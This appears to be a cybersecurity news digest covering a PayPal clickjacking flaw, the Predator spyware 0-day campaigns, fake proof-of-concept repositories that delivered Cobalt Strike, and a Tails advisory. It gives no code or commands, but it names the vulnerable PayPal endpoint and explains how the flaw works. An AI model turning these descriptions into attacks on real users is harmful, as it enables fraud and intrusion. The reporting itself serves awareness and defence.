Unpatched vulnerability in PayPal
Security researcher H4x0r-DZ has disclosed an unpatched vulnerability in PayPal’s money transfer service that could allow attackers to trick victims into stealing money by completing targeted transactions through clickjacking attacks.
This technique allows an attacker to trick a user into clicking on seemingly harmless elements of a web page for fraudulent purposes: downloading malware, redirecting them to malicious websites, or revealing sensitive information.
The researcher discovered that a paypal[.]com/agreements/approve endpoint, designed for billing agreements, and which should only allow tokens of the type billingAgreementToken, actually allowed another type of token to be received.
This would allow an attacker to include a specific iframe, which causes a victim logged into the website to transfer their funds to a PayPal account controlled by the attacker simply by clicking a button.
The researcher has decided to publish the proof of concept, after reporting the flaw to the company last October 2021 without having received any compensation or fix for this flaw from PayPal.
* * *
Predator spyware distributed through 0-days exploitation
Researchers from Google’s Threat Analysis Group (TAG) have revealed details on the use of new 0-days in Chrome and Android for the distribution of spyware known as Predator, a commercial cyber-espionage tool developed by Cytrox. The researchers report three separate campaigns.
The first campaign was detected in August 2021 and exploited a vulnerability in Chrome to redirect to SBrowser (CVE-2021-38000 CVSSv3 6.1). The second campaign started in September 2021 and exploited several vulnerabilities in Chrome to escape the browser sandbox (CVE-2021-37973 CVSSv3 9.8 and CVE-2021-37976 CVSSv3 6.5). Lastly, the third campaign dates from October 2021 and involves the use of 0-days in Chrome and Android (CVE-2021-38003 CVSSv3 8.8 and CVE-2021-1048 CVSSv3 7.8).
Despite exploiting different 0-days, the base of the campaigns was the same. The attackers distributed “one-time link” links (valid only once and expiring after 24 hours) by spoofing URL shortening services to Android users via email, from which they distributed the exploits.
The aim of the campaigns was to distribute the Android malware called ALIEN, which subsequently downloaded the Predator spyware. Regarding the attribution of the campaigns, the researchers suggest that the actors behind the campaigns are backed up by governments, and they particularly point to at least those of Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain and Indonesia. Their conclusions are in line with investigations carried out by CitizenLab in December 2021.
* * *
Distribution of Cobalt Strike via fake PoCs
Cyble security researchers have discovered that threat actors have reportedly used fake proof-of-concepts for two recent Windows vulnerabilities to infect their victims with Cobalt Strike. The attackers posted malicious PoCs on GitHub for the remote code execution vulnerabilities CVE-2022-24500 and CVE-2022-26809, both of which were fixed by Microsoft last April.
The two repositories belonged to the same GitHub user, named “rkxxz”, whose account and repositories have now been removed. The target of this type of practice, which is becoming increasingly common, tends to be individuals involved in information security.
According to Cyble’s analysis, the malware used in this campaign is a .NET application that displays a fake message about the attempted exploitation of the vulnerability and then executes PowerShell commands to download the Cobalt Strike beacon.
* * *
0-day vulnerability in Tails
Tails has issued a security advisory warning that a vulnerability has been found in its Tails 5.0 version which could affect users who use the Linux distribution to access the Tor browser.
Tails states that, if exploited, it could allow an attacker to obtain confidential information such as passwords, private messages, among others, although the encryption of connections used by Tor to maintain user anonymity would not have been affected.
Tails recommends rebooting the system and claims that Mozilla has detected activity related to the exploitation of these flaws.